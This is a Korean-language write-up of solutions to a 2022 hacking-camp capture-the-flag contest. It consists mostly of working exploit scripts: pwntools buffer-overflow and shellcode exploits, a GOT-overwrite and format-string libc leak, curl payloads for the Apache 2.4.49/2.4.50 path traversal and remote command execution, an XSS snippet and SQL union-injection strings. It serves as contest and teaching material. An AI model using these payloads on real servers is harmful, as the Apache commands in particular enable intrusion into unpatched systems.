CTF

(CTF) hacking camp CTF 24th writeup

snwo 2022. 2. 24. 23:56

(미스크, 포렌식, 기타 쉬운문제 제외한 간단 writeup)

 

 

invitation

from pwn import *

r=remote("ctf-hackingcamp.com",10319)
context.arch='i386'
b=ELF("./invitation")
pay=b'x'*0x18
pr=0x0804836d
pay+=p32(b.sym['CODE'])
r.sendafter("code : ",asm(shellcraft.i386.linux.sh()))
r.sendlineafter("password : ",pay)
r.interactive()

NX 가 꺼져잇어서 code 에 쉘코드넣고 해당위치로 리턴.

shell

execve 가 seccomp 걸려있었다.

도커파일있는줄 모르고 계속 getdents 로 읽어올려했는데 알고보니 /flag 에 있어서

편한 shellcraft 이용해서 orw

from pwn import *

r=remote("ctf-hackingcamp.com",14350)
context.log_level='debug'
context.arch='amd64'
sc=''
sc+=shellcraft.open("/flag")
sc+=shellcraft.read(3,'rsp',0x200)
sc+=shellcraft.write(1,'rsp',0x200)
sc=asm(sc)
r.send(sc)
r.interactive()

ssmash

마찬가지로 NX 가 꺼져있지만, canary 가 있어서

oob read 한 뒤, 쉘코드 적고 출력되는 buf 주소로 리턴

from pwn import *

r=remote("ctf-hackingcamp.com", 10305)
context.log_level='debug'
context.arch="amd64"
r.recvuntil("buf = ")
buf=int(r.recvline().strip(),16)
log.info(hex(buf))
r.sendafter("> ",b"ASMR")
pay=asm(shellcraft.sh())
pay=pay.ljust(0x88,b'\x90')
pay+=p64(buf)

r.sendlineafter("> ",pay)

r.interactive()

simple pwn

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int index; // [rsp+Ch] [rbp-34h] BYREF
  char buf[32]; // [rsp+10h] [rbp-30h] BYREF
  void *v5; // [rsp+30h] [rbp-10h]
  unsigned __int64 v6; // [rsp+38h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setup();
  while ( 1 )
  {
    puts("1. memo");
    puts("2. exit");
    printf("> ");
    __isoc99_scanf("%d", &index);
    if ( index != 1 )
      break;
    v5 = malloc(0x18uLL);
    printf("Name : ");
    read(0, buf, 0x28uLL);
    printf("Memo : ");
    read(0, v5, 8uLL);
    puts(buf);
  }
  exit(1);
}

처음에는 좀 당황해서 멍때리고 있다가

buf 주소에 dl_fini 남아있길래 그거 릭해서 쉘땄는데 당연하게도 리모트는 안됐다.

그래서 어떻게 릭할지 생각해보다가

puts(buf)

이 부분을 보고, printf@plt 으로 got overwrite 해서 FSB 를 이용해 leak 해야겠다고 떠올랐다.

릭한 뒤, puts 를 system 함수 주소로 바꾸고 buf 에 /bin/sh 줘서 쉘 실행

from pwn import *

r=remote("ctf-hackingcamp.com", 40020 )
lib=ELF("./libc-2.23.so")
# r=process("./simplepwn")
b=ELF("./simplepwn")
# lib=b.libc
context.log_level='debug'
r.sendlineafter("> ",b"1")
r.sendafter("Name : ",b'x'*0x20+p64(b.got['puts']))
r.sendafter("Memo : ",p64(b.plt['printf']))
r.sendlineafter("> ",b"1")
r.sendafter("Name : ",b'%15$p')
pause()
r.sendafter("Memo : ",b'xx')

libc=int(r.recv(2*7),16)-lib.sym['__libc_start_main']
libc=libc&0xfffffffffffff000
print(hex(libc))
r.sendlineafter("> ",b"1")
r.sendafter("Name : ",b'/bin/sh\x00'+b'x'*0x18+p64(b.got['puts']))
r.sendafter("Memo : ",p64(libc+lib.sym['system']))

r.interactive()

Baby Crack

아이다로 까보니까, 각 글자에서 더하거나 빼는 것을 볼 수 있는데,

khngEe 에서 다시 빼거나 더해서 된다.

Basecamp

seeds=[1645021014]
import ctypes
for seed in seeds:
    libc=ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6")
    libc.srand(seed)
    s=list('0123456789QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasd+/fghjklzxcvbnm')
    rs=[]
    for i in range(len(s)+1):
        v4=libc.rand()%len(s)
        v5=libc.rand()%len(s)
        tmp=s[v4]
        s[v4]=s[v5]
        s[v5]=tmp
    table=s
    enc  = open("out.txt").read()
    def decode(text):
        bins = str()
        out=['0']*len(text)
        for c in text:
            if c == '=':
                bins += '000000'
            else:
                bins += format(table.index(c),'06b')
        c=0
        for i in range(0,len(bins),8*3):
            try:
                out[c]=chr(int(bins[i:i+8],2))
                out[c+1]=chr(int(bins[i+8:i+16],2))
                out[c+2]=chr(int(bins[i+16:i+24],2))
            except:
                break
            c+=3
        return out
    print(''.join(decode(enc.strip())))

srand(time(0)) 한 뒤,

rand() 위치에 있는 base64 테이블을 길이+1번 섞는다.

out.txt 에서 수정시간을 epoch 시간으로 바꾼 다음, 그 값을 seed 로 사용해서

flag 를 암호화할 때 사용한 base64 테이블을 구할 수 있다.

이제 out.txt 에서 모든 값들을 6자리 2진수로 변환해서 붙인 뒤

8글자씩 잘라서 문자화 하면 된다.

HCAMP{R4nd0_m_t4b1e_b4_s3_64}

Encryptor

l=[99, 124, 119, 123, 242, 107, 111, 197, 48, 1, 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, 45, 15, 176, 84, 187, 22]
with open("out.txt","rb") as f:
    d=f.read()
    for i in range(0,len(d),2):
        c=d[i]
        # print(c)
        if l.index(c)>32 and l.index(c) <127 and l.index(c)!=ord('0'):
            print(f"{chr(l.index(c))*d[i+1]}",end='')

암호화 할 값을 table 의 index 로 하여 문자를 가져오고, 다음 바이트에 그 문자가 반복되는 횟수를 적는다.

table 이 invere 가능하기 때문에, out.txt 에서 해당 문자의 index 를 가져와 다음 바이트만큼 곱해주면 된다.

Apache

전에 2.4.49 path traversal 이 CTF 에 나온 적이 있다.

curl ‘https://ctf-hackingcamp.com:4088//cgi-bin/.%2e/.%2e/.%2e/.%2e/this_is_flag’

Apache v2

패치된버전에서 일어날 수 있는 취약점인데,

더블인코딩으로 우회할 수 있다

https://www.youtube.com/watch?v=WSVcuV2Wc58

이 유튜부 참고해서 RCE 해주면 된다.

curl -X POST -v --path-as-is 'http://ctf-hackingcamp.com:4089/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' -d 'echo;cat /flag'

simple php

https://github.com/mm0r1/exploits/blob/master/php-concat-bypass/exploit.php

웹쉘을 LFI 로 실행시킬 수 있지만, phpinfo 를 보면, disable function 이 엄청나게 많기 때문에

원데이 이용해서 RCE

memo

난독화된 자바스크립트 함수가 있는데,

flag 변수가 1이면 실행된다.

xss 발생하길래 <script>flag=1</script> 넣어봤더니 파일명 출력되고 flag 가 있었다.

합격자 발표

1" union select * from prob limit 5,6#
1" union select * from prob limit 6,6#
...

union select 취약점 이용해서 멤버 하나씩 불러오면,

플래그가 있다. concat 로 모든멤버 불러오는방법도 있더라